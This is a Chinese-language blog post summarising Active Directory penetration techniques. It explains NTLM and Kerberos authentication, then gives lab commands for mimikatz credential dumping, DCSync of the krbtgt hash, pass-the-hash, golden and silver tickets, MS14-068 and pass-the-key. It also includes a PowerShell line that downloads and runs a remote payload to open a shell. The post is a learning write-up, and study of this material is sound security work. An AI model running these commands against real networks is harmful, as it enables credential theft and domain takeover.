<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>域渗透常用姿势总结 | tkcharlotte&#39;s blog</title>
  
  

  

  <meta name="HandheldFriendly" content="True">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <!-- meta -->
  

  <!-- link -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.css">
  
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.6.3/css/all.min.css">
  

  

  
    <link rel="stylesheet" href="/style.css">
  

  <script>
    function setLoadingBarProgress(num) {
      document.getElementById('loading-bar').style.width=num+"%";
    }
  </script>

  
  
</head>

<body>
  
  
  <div class="cover-wrapper">
    <cover class='cover post half'>
      
        
  <h1 class='title'>tkcharlotte's blog</h1>


  <div class="m_search">
    <form name="searchform" class="form u-search-form">
      <input type="text" class="input u-search-input" placeholder="搜索" />
      <i class="icon fas fa-search fa-fw"></i>
    </form>
  </div>

<div class='menu navgation'>
  <ul class='h-list'>
    
      
        <li>
          <a class="nav home" href="/"
            
            
            id="home">
            <i class='fas fa-rss fa-fw'></i>&nbsp;文章
          </a>
        </li>
      
    
  </ul>
</div>

      
    </cover>
    <header class="l_header material">
  <div id="loading-bar-wrapper">
    <div id="loading-bar" class="material"></div>
  </div>

	<div class='wrapper'>
		<div class="nav-main container container--flex">
      <a class="logo flat-box" href='/' >
        
          tkcharlotte's blog
        
      </a>
			<div class='menu navgation'>
				<ul class='h-list'>
          
  					
  						<li>
								<a class="nav flat-box" href="/"
                  
                  
                  id="home">
									<i class='fas fa-grin fa-fw'></i>&nbsp;首页
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/categories/"
                  
                    rel="nofollow"
                  
                  
                  id="categories">
									<i class='fas fa-folder-open fa-fw'></i>&nbsp;分类
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/tags/"
                  
                    rel="nofollow"
                  
                  
                  id="tags">
									<i class='fas fa-hashtag fa-fw'></i>&nbsp;标签
								</a>
							</li>
      			
  						<li>
								<a class="nav flat-box" href="/archives/"
                  
                    rel="nofollow"
                  
                  
                  id="archives">
									<i class='fas fa-archive fa-fw'></i>&nbsp;归档
								</a>
							</li>
      			
      		
				</ul>
			</div>

			
				<div class="m_search">
					<form name="searchform" class="form u-search-form">
						<input type="text" class="input u-search-input" placeholder="搜索" />
						<i class="icon fas fa-search fa-fw"></i>
					</form>
				</div>
			
			<ul class='switcher h-list'>
				
					<li class='s-search'><a class="fas fa-search fa-fw" href='javascript:void(0)'></a></li>
				
				<li class='s-menu'><a class="fas fa-bars fa-fw" href='javascript:void(0)'></a></li>
			</ul>
		</div>

		<div class='nav-sub container container--flex'>
			<a class="logo flat-box"></a>
			<ul class='switcher h-list'>
				<li class='s-comment'><a class="flat-btn fas fa-comments fa-fw" href='javascript:void(0)'></a></li>
        
          <li class='s-toc'><a class="flat-btn fas fa-list fa-fw" href='javascript:void(0)'></a></li>
        
			</ul>
		</div>
	</div>
</header>
	<aside class="menu-phone">
    <header>
		<nav class="menu navgation">
      <ul>
        
          
            <li>
							<a class="nav flat-box" href="/archives/"
                
                  rel="nofollow"
                
                
                id="archives">
								<i class='fas fa-archive fa-fw'></i>&nbsp;文章归档
							</a>
            </li>
          
       
      </ul>
		</nav>
    </header>
	</aside>
<script>setLoadingBarProgress(40);</script>

  </div>


  <div class="l_body">
    <div class='body-wrapper'>
      <div class='l_main'>
  

  
    <article id="post" class="post white-box article-type-post" itemscope itemprop="blogPost">
      


  <section class='meta'>
    
    
    <div class="meta" id="header-meta">
      
        
  
    <h1 class="title">
      <a href="/2019/09/23/domain-1/">
        域渗透常用姿势总结
      </a>
    </h1>
  


      
      <div class='new-meta-box'>
        
          
        
          
            
  <div class='new-meta-item author'>
    <a href="https://boombao.net" rel="nofollow">
      
        <i class="fas fa-user" aria-hidden="true"></i>
      
      <p>tk</p>
    </a>
  </div>


          
        
          
            <div class="new-meta-item date">
  <a class='notlink'>
    <i class="fas fa-calendar-alt" aria-hidden="true"></i>
    <p>2019-09-23</p>
  </a>
</div>

          
        
          
            
  
  <div class='new-meta-item category'>
    <a href='/categories/安全/' rel="nofollow">
      <i class="fas fa-folder-open" aria-hidden="true"></i>
      <p>安全</p>
    </a>
  </div>


          
        
          
            
  


          
        
          
            

          
        
      </div>
      
        <hr>
      
    </div>
  </section>


	  
	  
      <section class="article typo">
        <div class="article-entry" itemprop="articleBody">

			<p>整理完这一套累死…<br>本文首发于<code>90sec</code>.</p>
<a id="more"></a>

<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>整理总结一下域渗透中常用的知识和手法，构建知识体系 : ）</p>
<p>感谢<code>klion</code>师傅提供的环境。</p>
<p>感谢各位师傅们的输出(ﾉ*･ω･)ﾉ 参考的文章基本都在参考链接中。</p>
<p><img src="https://www.71714.com/wp-content/uploads/2018/07/phpcode1530541353VdON2f.gif" alt></p>
<h3 id="域渗透-—-预备知识"><a href="#域渗透-—-预备知识" class="headerlink" title="域渗透 — 预备知识"></a>域渗透 — 预备知识</h3><h4 id="何为域"><a href="#何为域" class="headerlink" title="何为域"></a>何为域</h4><p>域（Domain）是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系（即Trust Relation）。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理。</p>
<p>在 Windows 网络操作系统中，域是安全边界。域管理员只能管理域的内部，除非其他的域显式地赋予他管理权限，他才能够访问或者管理其他的域；每个域都有自己的安全策略，以及它与其他域的安全信任关系。</p>
<h4 id="windows-认证方式"><a href="#windows-认证方式" class="headerlink" title="windows 认证方式"></a>windows 认证方式</h4><h5 id="NTLM认证"><a href="#NTLM认证" class="headerlink" title="NTLM认证"></a>NTLM认证</h5><p>本地登录时，用户的密码经过散列算法加密后存储在<code>system32\config\sam</code>文件，当用户在登录界面输入密码后，<code>winlogon.exe</code>接收用户输入，然后把密码给<code>lsass.exe</code>，将密码转成<code>NT Hash</code>,然后与文件中已有的散列值比较。</p>
<h6 id="Hash类型"><a href="#Hash类型" class="headerlink" title="Hash类型"></a>Hash类型</h6><p>LM Hash</p>
<p><code>LM(LAN Manager) Hash</code> 是早期使用的一种<code>hash</code>，在<code>windows vista</code>以后的版本中默认被禁用，使用更加安全的<code>NTLM Hash</code>.</p>
<p>NT Hash</p>
<p>现在<code>windows</code>存储使用的<code>hash</code></p>
<p>NTLM Hash</p>
<p> <code>NTLM</code>认证过程中使用的<code>hash</code>，是现代<code>windows</code>系统中使用的一种<code>hash</code>，由<code>NT Hash</code>和<code>LM Hash</code>组成。储存在<code>SAM</code>文件中，如果存在域环境，也储存在域控的<code>NTDS.dit</code>文件中，可以直接拿来进行哈希传递攻击。</p>
<h6 id="工作组环境中的认证"><a href="#工作组环境中的认证" class="headerlink" title="工作组环境中的认证"></a>工作组环境中的认证</h6><p>认证使用<code>NTLM</code>协议，采用<code>Challenge/Response</code> 机制，认证过程可以分为三步：</p>
<ol>
<li>协商： 确定双方协议版本</li>
<li>质询：<code>Challenge/Response</code> 机制起作用的环节</li>
<li>验证：质询完成后验证结果</li>
</ol>
<p>质询的主要过程：</p>
<ul>
<li><p>客户端向服务端发送用户(用户名)请求</p>
</li>
<li><p>服务端接收请求，生成一个16位的随机数，称为<code>Challenge</code>,使用用户名对应的<code>NTLM Hash</code>加密<code>Challange</code>,生成的值称为<code>Challenge-server</code>,同时将16位随机数发送给客户端。</p>
</li>
<li><p>客户端接收到<code>Chanllenge</code>后，使用想要登录的用户对应的<code>NTLM Hash</code>加密它，该值称为<code>Challenge-client</code>然后发送给服务端。</p>
</li>
<li><p>服务端收到客户端发送的<code>Challenge-client</code>与<code>Challenge-server</code>比较，相等即通过认证。</p>
<p>其实就是双方规定一个字符串，利用散列算法的单向性以及唯一性对同一串字符串加密，生成一串散列值然后比较是否相等,并没有做过多的验证，所以会导致安全问题，最常见的就是<code>pth</code>.</p>
</li>
</ul>
<h6 id="域环境中的认证"><a href="#域环境中的认证" class="headerlink" title="域环境中的认证"></a>域环境中的认证</h6><p>在域中首先使用的是<code>Kerberos</code>认证，在一些早期版本中或者是前者出错时才会用<code>NTLM</code>认证。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190918181108.png" alt></p>
<p>与在工作组中的认证相比，在域中的认证多了个域控，域中的认证过程可以分为以下几步：</p>
<ul>
<li><p>客户端获取输入的<code>username</code> <code>password</code> <code>domain</code>信息，传给服务器。</p>
</li>
<li><p>与上面一样，服务端发送16位的随机码给客户端。</p>
</li>
<li><p>客户端使用本地的<code>NTLM Hash</code>对随机码加密，得到的值发送给服务端。</p>
</li>
<li><p>服务端向域控发送验证消息，消息包括客户端申请的用户名 随机码以及传过来的<code>Net NTLM Hash</code></p>
</li>
<li><p>域控查看该用户对应的<code>NTLM Hash</code>,然后加密随机码，将得到的<code>Net NTLM Hash</code>与客户端的做比较，将结果发给服务端。</p>
</li>
<li><p>服务端根据结果是否相等来返回给客户端不同的结果，验证通过或者是不通过。</p>
<p>可以看到与工作组认证相比，把验证对比的权利交给了域控，服务端只是起一个中间人的角色，负责传话。</p>
</li>
</ul>
<h6 id="pth"><a href="#pth" class="headerlink" title="pth"></a>pth</h6><p>从工作组认证过程可以看出，并没有对16位的随机字符串<code>Challenge</code>做任何处理，只是采用<code>NTLM Hash</code>对其加密，如果我们可以拿到该用户的<code>NTLM Hash</code>就能伪造一个正确的<code>Challenge-client</code>传给服务端完成认证，如果拿到<code>hash</code>以后无法解密，就可以尝试一下<code>pth</code>.</p>
<p>在一定条件下<code>pth</code>也可以用于远程桌面登录，细节看三好学生师傅<a href="[https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/](https://3gstudent.github.io/3gstudent.github.io/渗透技巧-Pass-the-Hash-with-Remote-Desktop/)">文章</a></p>
<h6 id="ptk"><a href="#ptk" class="headerlink" title="ptk"></a>ptk</h6><p>上文中提到可以使用<code>pth(pass the hash)</code>来完成对内网的渗透拓展，控制其他主机，微软在12年发布了针对<code>pth</code>的补丁<code>KBb2871997</code>,打了补丁以后常规的攻击无法复现，但是忽略了默认的<code>Administrator(SID 500)</code>,只要用户的<code>SID</code>为500，就可以用该账户进行攻击。</p>
<p>在内网禁用了<code>NTLM</code>的环境下也无法进行传递攻击。而<code>mimikatz</code>中的<code>sekurlsa::pth</code>模块可以突破这一点，使用<code>aes key</code> 完成攻击，所以被称为<code>pass-the-key</code>.</p>
<h5 id="Kerberos认证"><a href="#Kerberos认证" class="headerlink" title="Kerberos认证"></a>Kerberos认证</h5><p><code>Kerberos</code>认证涉及到三方，分别是<code>Client</code> <code>KDC</code> <code>Server</code>，而<code>KDC</code>又分为两部分，分别是<code>AS(Authentication Server)</code>以及<code>TGS(Ticket Granting Server)</code>,在该认证过程中靠的是票据，类似于<code>Token</code>一样的一种表明身份的东西。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190919085624.png" alt></p>
<p><code>kerberos</code>认证可以类比坐火车，首先你要通过火车站的安检系统，这样才能进入火车站，进站以后拿到上车的凭证-车票，上车时再核对车票信息，一切都通过后就可以享受火车之旅，同样的，在<code>kerberos</code>认证中<code>Client</code>先与<code>AS</code>交互，得到一个凭证来访问<code>TGS</code>，再与<code>TGS</code>交互，得到访问服务的凭证，最后与服务器交互，完成信息交互。</p>
<p>详细的认证过程如下：</p>
<p>首先是<code>AS</code>与<code>Client</code>交互：</p>
<ul>
<li><p><code>Client</code>向<code>AS</code>发送自己的<code>ID</code>  网络地址 等信息，经过<code>Client</code>的<code>hash</code>加密。(KRB_AS_REQ)</p>
</li>
<li><p><code>AS</code>向<code>Client</code>发送两条消息，一条是经过<code>Client</code>密码加密的<code>TGS-Session-Key</code>,用作与<code>TGS</code>交互的密钥.</p>
<p>另一条消息就是<code>TGT</code>,<code>TGT</code>包括<code>TGS-Session-Key</code>以及时间戳等信息，由<code>KRBTGT</code>账户的<code>hash</code>加密，该账户是域创建时自动创建的账号。(KRB_AS_REP)</p>
</li>
</ul>
<p>然后是<code>Client</code>与<code>TGS</code>的交互：</p>
<ul>
<li><code>Client</code>收到<code>AS</code>返回的信息，解密第一条信息，得到与<code>TGS</code>交互的密钥。然后将本地信息通过密钥加密后连同<code>TGT</code>一起发送给<code>TGS</code>.(KRB_TGS_REQ)</li>
<li><code>TGS</code>接收到消息后会检查是否存在所请求的服务，如果存在就用<code>KRBTGT</code>账户的<code>Hash</code>解密<code>TGT</code>,然后验证相关信息，验证通过后会使用<code>TGS-Session-Key</code>加密<code>Server-Session-Key</code>(<code>Client</code>与<code>Server</code>交互的密钥)，将时间戳 生命周期等信息通过服务的<code>Hash</code>加密后作为<code>Server-Ticket</code>传给<code>Client</code>.(KRB_TGS_REP)</li>
</ul>
<p>最后是<code>Client</code>与<code>Server</code>的交互：</p>
<ul>
<li><code>Client</code>获得<code>TGS</code>发回的数据后用<code>TGS-Session-Key</code>解密得到<code>Server-Session-Key</code>,将网络地址 ID等信息通过<code>Server-Session-Key</code>加密，连带<code>Server-Ticket</code>一起发送给<code>Server</code>.(KRB_AP_REQ)</li>
<li><code>Server</code>接收到消息后会用自身<code>Hash</code>解密<code>Server-Ticket</code>，然后验证，验证通过后开始传输数据，走正常的服务请求。(KRB_AP_REP)</li>
</ul>
<h6 id="Golden-Ticket-黄金票据"><a href="#Golden-Ticket-黄金票据" class="headerlink" title="Golden Ticket(黄金票据)"></a>Golden Ticket(黄金票据)</h6><p><code>TGT</code>是由<code>KRBTGT</code>用户生成的，有了该票据你可以访问任何通过<code>kerberos</code>认证的服务，如果我们拿到了该用户的<code>Hash</code>，那么我们就可以伪造<code>TGT</code>,该用户只存在于域控中，所以前提是你要拿到域控的权限，有了域控权限干啥不行…  </p>
<h6 id="Silver-Ticket-白银票据"><a href="#Silver-Ticket-白银票据" class="headerlink" title="Silver Ticket(白银票据)"></a>Silver Ticket(白银票据)</h6><p>如果我们有服务器上的用户<code>Hash</code>,就可以伪造一个<code>Server-Ticket</code>绕过认证，达到访问服务的目的。白银票据只能访问特定的服务。</p>
<h6 id="MS14-068"><a href="#MS14-068" class="headerlink" title="MS14-068"></a>MS14-068</h6><p><code>MS14-068</code>是密钥分发中心（<code>KDC</code>）服务中的Windows漏洞。它允许经过身份验证的用户在其<code>Kerberos</code>票据（<code>TGT</code>）中<br>插入任意PAC（表示所有用户权限的结构）。该漏洞位于<code>kdcsvc.dll</code>域控的<code>KDC</code>中。用户可以通过<br>呈现具有改变的<code>PAC</code>的<code>Kerberos TGT</code>来获得票据。</p>
<p>一句话，可以在拥有一个普通域用户的情况下可以提升为域管理权限。</p>
<h6 id="委派攻击"><a href="#委派攻击" class="headerlink" title="委派攻击"></a>委派攻击</h6><p>委派分为三种，分别是无约束委派 约束委派以及基于资源的约束委派.</p>
<p>委派简单来说就是模拟客户端，允许服务器用客户端的身份与其他服务交互，比方说在域中有站库分离的<code>web</code>服务，客户端A,<code>http</code>服务器B,<code>mysql</code>服务器C，A想要获得某些数据，就需要B与C交互，这时B扮演的就是客户端的角色，这就是一个委派的例子。</p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190919181140.png" alt></p>
<p>委派的认证过程如下：</p>
<p>客户端与<code>KDC</code>完成<code>KRB_AS_REP</code> <code>KRB_AS_REQ</code> 交互.拿到<code>forwardable TGT</code>.</p>
<p>客户端通过<code>KRB_TGS_REQ</code> 请求转发的<code>TGT</code>,记作<code>forwarded TGT</code>,<code>KDC</code>通过<code>KRB_TGS_REP</code>返回该票据。</p>
<p>客户端使用<code>forwarded TGT</code>通过<code>KRB_TGS_REQ</code>请求<code>Server 1</code>的服务对应的票据，<code>KDC</code>通过<code>KRB_TGS_REP</code>返回票据。</p>
<p>客户端通过<code>KRB_AP_REQ</code>向<code>Server 1</code>发送服务票据 <code>forwardable TGT</code> <code>forwarded TGT</code>以及对应的密钥等信息。</p>
<p>为了满足客户端的需求，<code>Server 1</code>需要用到<code>server2</code>的一些数据，需要<code>server1</code>以用户的身份请求<code>Server 2</code>，在该过程中，<code>server1</code>使用<code>forwarded TGT</code>，以用户的名义通过<code>KRB_TGS_REQ</code>向<code>KDC</code>请求<code>Server 2</code>的服务票据，通过<code>KRB_TGS_REP</code>返回<code>server2</code>的服务票据。</p>
<p><code>server1</code> 用该票据请求<code>server2</code>，获取数据。</p>
<p>然后重复上述的过程…</p>
<p>当开启无约束委派时，<code>DC</code>会将客户端的<code>TGT</code>的副本放在服务票据中，当客户端向服务器提供服务票据时，服务器会将票据中的用户<code>TGT</code>放入<code>lsass.exe</code>中，在有效期内可以无限制的假冒该用户。如果管理员访问了无约束委派的服务，就能拿到管理员的<code>TGT</code>,模拟域管理访问任意服务，获得管理权限。</p>
<p>为了解决上述问题，微软提出了约束性委派，微软发布了两个<code>kerberos</code>拓展协议，<code>S4U2Proxy</code>和<code>S4U2Self</code>.</p>
<p>无约束委派中直接拿用户的<code>TGT</code>访问服务，在委派服务中，服务A<code>S4UProxy</code>向<code>KDC</code>申请访问服务B的服务票据，然后A使用<code>KDC</code>返回的新票据来访问B。<code>S4USelf</code>协议用来转换非<code>kerberos</code>协议与服务的认证，向服务器申请服务票据，就可以使用<code>S4UProxy</code>协议请求访问其他服务的票据。</p>
<p>有点懵… 先占个坑</p>
<p><a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-8135-400e-bdd9-33b552051d94" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-8135-400e-bdd9-33b552051d94</a></p>
<p>基于资源的约束委派，可以看<a href="http://blog.nsfocus.net/analysis-attacks-entitlement-resource-constrained-delegation/" target="_blank" rel="noopener">绿盟博客</a></p>
<h6 id="Kerberoasting"><a href="#Kerberoasting" class="headerlink" title="Kerberoasting"></a>Kerberoasting</h6><p>在<code>kerberos</code>认证过程的第四步中，<code>TGS</code>会向<code>Client</code>发送经过服务账户的<code>Hash</code>加密后的服务票据，我们可以拿到这个票据，在本地模拟加密过程对密码进行爆破。如果得到的票据相同，说明得到了服务账户的密码。</p>
<p>服务主体名称(<code>Service Principal Names</code> <code>SPN</code>)是服务器运行服务的唯一标识，每个使用<code>kerberos</code>协议的服务都需要注册一个<code>SPN</code>,<code>SPN</code>分为两种，一种注册在域内机器用户账户(Computer),一种注册在域内用户账户(User)。机器账户一般是默认注册的，如果在域用户下运行服务，必须手动注册<code>SPN</code>,用到<code>setspn.exe</code>。</p>
<p>通过<code>SPN</code>查询，可以挖掘有用的信息，注册在域内用户账户下的<code>SPN</code>, 使用<code>Kerberoast</code>攻击尝试获取密码，也可以找到域中开启相关服务的主机，可以尝试用当前域用户信息登录主机，因为<code>SPN</code>发生在认证过程中，属于正常范围之内，所以比较难检测。</p>
<h4 id="组策略首选项-SYSVOL-GPP漏洞-–2k08"><a href="#组策略首选项-SYSVOL-GPP漏洞-–2k08" class="headerlink" title="组策略首选项 + SYSVOL (GPP漏洞 –2k08)"></a>组策略首选项 + SYSVOL (GPP漏洞 –2k08)</h4><p><code>SYSVOL</code>存在于域中的所有域控中。包含公共文件的共享文件夹，包括组策略数据 ，经过认证的用户都可以访问该文件夹。所有域组策略都存储在这里：<code>\\ &lt;DOMAIN&gt; \ SYSVOL \ &lt;DOMAIN&gt; \ Policies \</code></p>
<p>在<code>win2k8</code>中添加了<code>GPP</code>选项，即组策略首选项，可以完成更多的系统及应用管理，比如说管理本地用户 添加计划任务等。</p>
<p>在08的域控上为域主机远程添加用户，所有的操作都会写到<code>Group.xml</code>文件中，包括创建的账户名称 时间 以及加密后的密码。该密码默认是用<code>AES256</code>加密的，而且官方提供了完整的<a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN#endNote2" target="_blank" rel="noopener">密钥</a>,正好用来解密得到密码。漏洞的补丁编号为<code>KB2962486</code>.</p>
<h4 id="域信任关系"><a href="#域信任关系" class="headerlink" title="域信任关系"></a>域信任关系</h4><p>域信任关系可以认为是一个域与其他域之间的一种资源访问控制，就像两个国家之间的外交关系，有合作伙伴 也有战略合作伙伴，不同的等级对应的开放程度也不相同。</p>
<p>域信任是有方向的，单向信任以及双向信任。</p>
<p>域信任按传递性可以分为可以传递的(朋友的朋友还是朋友，A-&gt;B B-&gt;C =&gt;A-&gt;C)和非传递性的.</p>
<p>默认信任关系</p>
<p>手动创建的其他信任关系</p>
<p><a href="https://wenku.baidu.com/view/196c4f7f27284b73f2425042.html" target="_blank" rel="noopener">域和信任关系</a></p>
<h4 id="域信息收集常用命令"><a href="#域信息收集常用命令" class="headerlink" title="域信息收集常用命令"></a>域信息收集常用命令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">ipconfig/all  				 					查看ip</span><br><span class="line">net user 	  									查看本地用户</span><br><span class="line">net user /domain 								 查看域用户</span><br><span class="line">net view /domain			 					查看有几个域</span><br><span class="line">net view /domain:domain_name  					查看某个域内主机</span><br><span class="line">net group /domain             					查看域有哪些组</span><br><span class="line">net group “domain admins” /domain 				查看域管理员组</span><br><span class="line">net group “domain controllers” /domain			查看域控</span><br><span class="line">net localgroup administrators /domain			查看域管理</span><br><span class="line">net time</span><br><span class="line">hostname									 主机名</span><br><span class="line">query user									  用户登录信息 判断用户是否在线</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<h4 id="待补充…"><a href="#待补充…" class="headerlink" title="待补充…"></a>待补充…</h4><h3 id="域渗透-—-实践过程"><a href="#域渗透-—-实践过程" class="headerlink" title="域渗透 — 实践过程"></a>域渗透 — 实践过程</h3><h4 id="pth-1"><a href="#pth-1" class="headerlink" title="pth"></a>pth</h4><p>拿到了用户的哈希解不开时，可以使用<code>pth</code></p>
<h5 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug </span><br><span class="line">sekurlsa::logonpasswords</span><br><span class="line">如果显示不全，采用非交互式可以导出到文件中查看</span><br><span class="line">mimikatz.exe &quot;&quot;privilege::debug&quot;&quot; &quot;&quot;sekurlsa::logonpasswords&quot;&quot; exit &gt;&gt; result.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920143931.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ntlm_hash </span><br><span class="line">ps：3.144 为域控ip</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920150511.png" alt></p>
<h5 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h5><p><a href="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1" target="_blank" rel="noopener">Invoke-WMIExec.ps1</a></p>
<p>可以执行命令，也可以反弹一个<code>shell</code>,此处加载<code>payload</code>,反弹给<code>cs</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Invoke-WMIExec  -Target 192.168.3.144 -Domain workgroup -Username administrator -Hash hash -Command &quot;powershell.exe iex(New-Object Net.WebClient).DownloadString(&apos;http://192.168.3.128</span><br><span class="line">/payload.ps1&apos;)&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920153716.png" alt></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920153617.png" alt></p>
<h4 id="ptt"><a href="#ptt" class="headerlink" title="ptt"></a>ptt</h4><p>用在<code>kerberos</code>认证中，主要有以下三种..</p>
<h5 id="MS14-068-1"><a href="#MS14-068-1" class="headerlink" title="MS14-068"></a>MS14-068</h5><p>域内用户的<code>sid</code>  域用户的密码  域控位置</p>
<p><a href="https://github.com/abatchy17/WindowsExploits/blob/master/MS14-068/MS14-068.exe" target="_blank" rel="noopener">MS14-068.exe</a></p>
<p><code>whoami /all</code>查看用户<code>sid</code></p>
<p>工具相关参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">-u 域主机名@域名</span><br><span class="line">-p 密码</span><br><span class="line">-s sid值</span><br><span class="line">-d 域控</span><br></pre></td></tr></table></figure>

<p>生成<code>ccache</code>文件</p>
<p><code>MS14-068.exe -u sqladmin@rootkit.org -p password -s S-1-5-21-3759881954-2993291187-3577547808-1613 -d OWA2013.rootkit.org</code></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921100150.png" alt></p>
<p>使用法国神器导入之前生成的<code>ccache</code>文件，导入之前先清除一下缓存中的票据</p>
<h5 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h5><p>前提：</p>
<ul>
<li>域名</li>
<li>sid</li>
<li><code>krbtgt</code>账户的<code>NTLM HASH</code></li>
<li>伪造用户名</li>
</ul>
<p>导出<code>krbtgt</code> 的<code>Hash</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">lsadump::dcsync /user:krbtgt</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921105552.png" alt></p>
<p>生成黄金票据，伪造域用户<code>administrator</code>，注入票据后查看域用户共享</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::golden /domain:rootkit.org /sid:sid/aes256:ase256 /user:administrator /ticket:admin.kirbi</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921110804.png" alt></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921113004.png" alt></p>
<p>也可以使用<code>Hash</code>值，不使用<code>key</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lsadump::lsa /patch 导出hash</span><br><span class="line">kerberos::golden /domain:rootkit.org /sid:sid /krbtgt:hash /user:administrator /ticket:admin.kirbi</span><br></pre></td></tr></table></figure>

<h5 id="白银票据"><a href="#白银票据" class="headerlink" title="白银票据"></a>白银票据</h5><p>白银票据不需要与<code>KDC</code>交互，需要服务的<code>Hash</code>，只能面向特定服务。</p>
<p>复现之前记得先清除票据.</p>
<p><code>klist purge</code> 或者在<code>mimikatz</code>中：<code>kerberos:：purge</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::golden /user:dbadmin /domain:rootkit.org /sid:sid /targe</span><br><span class="line">t:Srv-Web-Kit.rootkit.org /rc4:ntlm_hash /ptt</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921123535.png" alt></p>
<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190921123729.png" alt></p>
<h4 id="ptk-1"><a href="#ptk-1" class="headerlink" title="ptk"></a>ptk</h4><p>前面的概念中提过一点，打了补丁以后，<code>ptt</code>只能用<code>mimikatz</code>来完成。</p>
<p>获取<code>aes key</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::ekeys</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920170715.png" alt></p>
<p>导入<code>key</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # sekurlsa::pth /user:administrator /domain:workgroup /aes128:key</span><br></pre></td></tr></table></figure>

<p><img src="https://boombao.oss-cn-beijing.aliyuncs.com/20190920171934.png" alt></p>
<p>要用主机名访问… 在这卡了好一会…</p>
<h4 id="kerberoast"><a href="#kerberoast" class="headerlink" title="kerberoast"></a>kerberoast</h4><p>攻击一般分为<code>SPN</code>发现，请求票据 导出票据 破解票据 重写这几部分。</p>
<p>第一种使用<code>mimikatz</code>的方法</p>
<p><a href="https://github.com/nidem/kerberoast" target="_blank" rel="noopener">kerberoast</a></p>
<p>使用工具集中的<code>GetUserSPNs.ps1</code>进行扫描</p>
